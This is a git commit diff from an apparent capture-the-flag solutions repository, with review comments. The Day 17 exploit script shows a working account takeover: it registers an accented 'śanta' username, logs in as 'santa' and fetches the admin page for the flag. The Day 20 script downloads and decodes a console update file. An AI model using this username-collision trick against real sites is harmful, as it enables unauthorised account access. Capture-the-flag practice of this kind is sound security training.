
Day 20 + 17 fix

Roman Hergenreder 4 years ago
parent
commit
45862b6590
3 changed files with 33 additions and 5 deletions
  1. 3 3
      Day 17/exploit.py
  2. 1 0
      Day 20/.gitignore
  3. 29 2
      Day 20/decode.py

+ 3 - 3
Day 17/exploit.py

@@ -13,21 +13,21 @@ FLAG_PATTERN = re.compile("HV19\{[^}]*\}")
 # 1. register user santa
 res = SESSION.post(BASE_URL + "/register.php", data={"username": "śanta", "pwd": PASSWORD, "pwd2": PASSWORD})
 if res.status_code != 200 or "Registration successful!" not in res.text:
-    print("Server returned: %d %s" % (res.status_code, res.status_text))
+    print("Server returned: %d %s" % (res.status_code, res.reason))
     print(res.text)
     exit(1)
 
 # 2. login
 res = SESSION.post(BASE_URL + "/login.php", data={"username": "santa", "pwd": PASSWORD})
 if res.status_code != 200 or "username not found or wrong password!" in res.text:
-    print("Server returned: %d %s" % (res.status_code, res.status_text))
+    print("Server returned: %d %s" % (res.status_code, res.reason))
     print(res.text)
     exit(1)
 
 # 3. get flag
 res = SESSION.get(BASE_URL + "/admin.php")
 if res.status_code != 200 or "username not found or wrong password!" in res.text:
-    print("Server returned: %d %s" % (res.status_code, res.status_text))
+    print("Server returned: %d %s" % (res.status_code, res.reason))
     exit(1)
 
 print(FLAG_PATTERN.search(res.text))
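Review bot: The step 1 comment says `register user santa`, but the request registers `śanta` (accented s) while step 2 logs in as plain `santa`, and nothing in the script says that this difference is deliberate. A comment such as `# 1. register "śanta" (accented s); the login below uses plain "santa", so this relies on the server treating both names as one account` would make it explicit. Presumably the backend compares usernames accent-insensitively or normalises them only after the uniqueness check; that is inferred rather than visible here, and it is what a server-side fix would have to address. Separately, the step 3 check reuses the login error string `"username not found or wrong password!"`, which looks copy-pasted, and the three identical `print("Server returned: ...")` / `exit(1)` stanzas could share one helper.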

+ 1 - 0
Day 20/.gitignore

@@ -0,0 +1 @@
+PS4UPDATE\.PUP

+ 29 - 2
Day 20/decode.py

@@ -1,9 +1,36 @@
+#!/usr/bin/python
 
-byte_300 = [0xCE, 0x55, 0x95, 0x4E, 0x38, 0x0C5, 0x89, 0x0A5, 0x1B, 0x6F, 0x5E, 0x25, 0x0D2, 0x1D, 0x2A, 0x2B, 0x5E, 0x7B, 0x39, 0x14, 0x8E, 0x0D0, 0x0F0, 0x0F8, 0x0F8, 0x0A5]
+import requests
+import hashlib
+import os
 
+byte_300 = [0xCE, 0x55, 0x95, 0x4E, 0x38, 0x0C5, 0x89, 0x0A5, 0x1B, 0x6F, 0x5E, 0x25, 0x0D2, \
+            0x1D, 0x2A, 0x2B, 0x5E, 0x7B, 0x39, 0x14, 0x8E, 0x0D0, 0x0F0, 0x0F8, 0x0F8, 0x0A5]
+
+EXPECTED_HASH = "f86d4f9d2c049547bd61f942151ffb55"
+INPUT_FILE = "PS4UPDATE.PUP"
 BUFFER_LENGTH = len(byte_300)
 
-with open("PS4UPDATE.PUP", "rb") as f:
+def downloadFile():
+    print("Downloading file…")
+    res = requests.get("https://psarchive.darksoftware.xyz/505Retail.PUP")
+    if res.status_code != 200:
+        print("Server returned: %d %s" % (res.status_code, res.reason))
+        exit(1)
+
+    buffer = res.content
+    hash = hashlib.md5(buffer).hexdigest()
+    if hash != EXPECTED_HASH:
+        print("Hash does not match:", hash)
+        exit(1)
+
+    with open(INPUT_FILE, "wb") as f:
+        f.write(buffer)
+
+if not os.path.isfile(INPUT_FILE):
+    downloadFile()
+
+with open(INPUT_FILE, "rb") as f:
 
     v29 = byte_300.copy()
     v14 = 4919;
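Review bot: `downloadFile()` verifies the download with MD5 (`hashlib.md5(buffer).hexdigest()` against `EXPECTED_HASH`), which is no longer collision-resistant and so is a weaker integrity pin than necessary for a file fetched from a third-party host. Pinning a SHA-256 digest costs nothing: `EXPECTED_HASH = "<sha256 of the known-good file>"` and `digest = hashlib.sha256(buffer).hexdigest()`; using `digest` also stops the local `hash` from shadowing the builtin. The `requests.get(...)` call has no `timeout`, so a stalled server hangs the script indefinitely; `requests.get(url, timeout=30)` (example value) bounds it. The `with open(INPUT_FILE, "rb")` block at the end continues outside the hunk.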